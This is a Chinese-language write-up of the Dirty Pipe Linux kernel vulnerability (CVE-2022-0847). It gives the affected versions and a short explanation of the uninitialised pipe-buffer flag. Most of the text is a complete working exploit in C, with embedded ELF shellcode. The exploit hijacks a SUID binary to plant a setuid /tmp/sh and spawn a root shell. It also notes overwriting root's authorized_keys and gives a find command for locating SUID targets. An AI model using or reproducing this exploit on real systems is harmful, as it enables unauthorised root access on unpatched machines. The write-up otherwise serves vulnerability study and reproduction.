影响范围

linux内核5.8及其之后版本

已在Linux5.16.11,5.15.25,5.10.102中修复

image.png

前言

攻击者可通过此漏洞,覆盖任意只读文件中的数据,这会导致权限提升,因为非特权进程可以将代码注入到根进程当中

漏洞原理类似于脏牛漏洞

漏洞原理

通过pipe生成一个管道,然后使用write调用pip_write将管道填满flag为PIPE_BUF_FLAG_CAN_MERGE,然后用read将缓冲区全部释放,但是根据splice进行零拷贝时copy_page_to_iter_pipe没有将flag初始化,导致缓冲区仍然留存PIPE_BUF_FLAG_CAN_MERGE。进而在write上检测flag存在PIPE_BUF_FLAG_CAN_MERGE来达成越权写入操作。

零拷贝是作用于两个文件间移动,正常文件拷贝流程一般为cpu对内存空间进行多次读写操作将拷贝数据从用户态到内核态再返回用户态,而零拷贝让数据不需要经过用户态,而是将内核缓冲区与用户程序进行共享,这样就不需要把内核缓冲区的内容往用户空间拷贝。应用程序再调用write(),操作系统直接将内核缓冲区的内容传输到指定输出端了。
具体的文件通过管道传输流程:
in端 == write == pipe == splice == out端
out端通过splice与内核缓冲区进行共享,然后in端调用write将内容拷贝到内核缓冲区进而写入到out端。

漏洞复现

EXP地址

https://haxx.in/files/dirtypipez.c

  1. //
  2. // dirtypipez.c
  3. //
  4. // hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn
  5. // a root shell. (and attempts to restore the damaged binary as well)
  6. //
  7. // Wow, Dirty CoW reloaded!
  8. //
  9. // -- blasty <peter@haxx.in> // 2022-03-07
  10. /* SPDX-License-Identifier: GPL-2.0 */
  11. /*
  12. * Copyright 2022 CM4all GmbH / IONOS SE
  13. *
  14. * author: Max Kellermann <max.kellermann@ionos.com>
  15. *
  16. * Proof-of-concept exploit for the Dirty Pipe
  17. * vulnerability (CVE-2022-0847) caused by an uninitialized
  18. * "pipe_buffer.flags" variable. It demonstrates how to overwrite any
  19. * file contents in the page cache, even if the file is not permitted
  20. * to be written, immutable or on a read-only mount.
  21. *
  22. * This exploit requires Linux 5.8 or later; the code path was made
  23. * reachable by commit f6dd975583bd ("pipe: merge
  24. * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
  25. * there before, it just provided an easy way to exploit it.
  26. *
  27. * There are two major limitations of this exploit: the offset cannot
  28. * be on a page boundary (it needs to write one byte before the offset
  29. * to add a reference to this page to the pipe), and the write cannot
  30. * cross a page boundary.
  31. *
  32. * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
  33. *
  34. * Further explanation: https://dirtypipe.cm4all.com/
  35. */
  36. #define _GNU_SOURCE
  37. #include <unistd.h>
  38. #include <fcntl.h>
  39. #include <stdio.h>
  40. #include <stdlib.h>
  41. #include <string.h>
  42. #include <sys/stat.h>
  43. #include <sys/user.h>
  44. #include <stdint.h>
  45. #ifndef PAGE_SIZE
  46. #define PAGE_SIZE 4096
  47. #endif
  48. // small (linux x86_64) ELF file matroshka doll that does;
  49. // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
  50. // write(fd, elfcode, elfcode_len)
  51. // chmod("/tmp/sh", 04755)
  52. // close(fd);
  53. // exit(0);
  54. //
  55. // the dropped ELF simply does:
  56. // setuid(0);
  57. // setgid(0);
  58. // execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
  59. unsigned char elfcode[] = {
  60. /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  61. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  62. 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  63. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  64. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  65. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
  66. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  67. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  68. 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
  69. 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  70. 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
  71. 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
  72. 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
  73. 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
  74. 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
  75. 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
  76. 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
  77. 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
  78. 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
  79. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
  80. 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
  81. 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  82. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
  83. 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
  84. 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  85. 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
  86. 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  87. 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
  88. 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
  89. 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
  90. 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
  91. 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
  92. 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
  93. 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
  94. };
  95. /**
  96. * Create a pipe where all "bufs" on the pipe_inode_info ring have the
  97. * PIPE_BUF_FLAG_CAN_MERGE flag set.
  98. */
  99. static void prepare_pipe(int p[2])
  100. {
  101. if (pipe(p)) abort();
  102. const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
  103. static char buffer[4096];
  104. /* fill the pipe completely; each pipe_buffer will now have
  105. the PIPE_BUF_FLAG_CAN_MERGE flag */
  106. for (unsigned r = pipe_size; r > 0;) {
  107. unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
  108. write(p[1], buffer, n);
  109. r -= n;
  110. }
  111. /* drain the pipe, freeing all pipe_buffer instances (but
  112. leaving the flags initialized) */
  113. for (unsigned r = pipe_size; r > 0;) {
  114. unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
  115. read(p[0], buffer, n);
  116. r -= n;
  117. }
  118. /* the pipe is now empty, and if somebody adds a new
  119. pipe_buffer without initializing its "flags", the buffer
  120. will be mergeable */
  121. }
  122. int hax(char *filename, long offset, uint8_t *data, size_t len) {
  123. /* open the input file and validate the specified offset */
  124. const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
  125. if (fd < 0) {
  126. perror("open failed");
  127. return -1;
  128. }
  129. struct stat st;
  130. if (fstat(fd, &st)) {
  131. perror("stat failed");
  132. return -1;
  133. }
  134. /* create the pipe with all flags initialized with
  135. PIPE_BUF_FLAG_CAN_MERGE */
  136. int p[2];
  137. prepare_pipe(p);
  138. /* splice one byte from before the specified offset into the
  139. pipe; this will add a reference to the page cache, but
  140. since copy_page_to_iter_pipe() does not initialize the
  141. "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
  142. --offset;
  143. ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
  144. if (nbytes < 0) {
  145. perror("splice failed");
  146. return -1;
  147. }
  148. if (nbytes == 0) {
  149. fprintf(stderr, "short splice\n");
  150. return -1;
  151. }
  152. /* the following write will not create a new pipe_buffer, but
  153. will instead write into the page cache, because of the
  154. PIPE_BUF_FLAG_CAN_MERGE flag */
  155. nbytes = write(p[1], data, len);
  156. if (nbytes < 0) {
  157. perror("write failed");
  158. return -1;
  159. }
  160. if ((size_t)nbytes < len) {
  161. fprintf(stderr, "short write\n");
  162. return -1;
  163. }
  164. close(fd);
  165. return 0;
  166. }
  167. int main(int argc, char **argv) {
  168. if (argc != 2) {
  169. fprintf(stderr, "Usage: %s SUID\n", argv[0]);
  170. return EXIT_FAILURE;
  171. }
  172. char *path = argv[1];
  173. uint8_t *data = elfcode;
  174. int fd = open(path, O_RDONLY);
  175. uint8_t *orig_bytes = malloc(sizeof(elfcode));
  176. lseek(fd, 1, SEEK_SET);
  177. read(fd, orig_bytes, sizeof(elfcode));
  178. close(fd);
  179. printf("[+] hijacking suid binary..\n");
  180. if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
  181. printf("[~] failed\n");
  182. return EXIT_FAILURE;
  183. }
  184. printf("[+] dropping suid shell..\n");
  185. system(path);
  186. printf("[+] restoring suid binary..\n");
  187. if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
  188. printf("[~] failed\n");
  189. return EXIT_FAILURE;
  190. }
  191. printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
  192. system("/tmp/sh");
  193. return EXIT_SUCCESS;
  194. }

查找具有suid权限的可执行文件

  1. find / -user root -perm /4000 2>/dev/null

image.png

编译

image.png

执行

image.png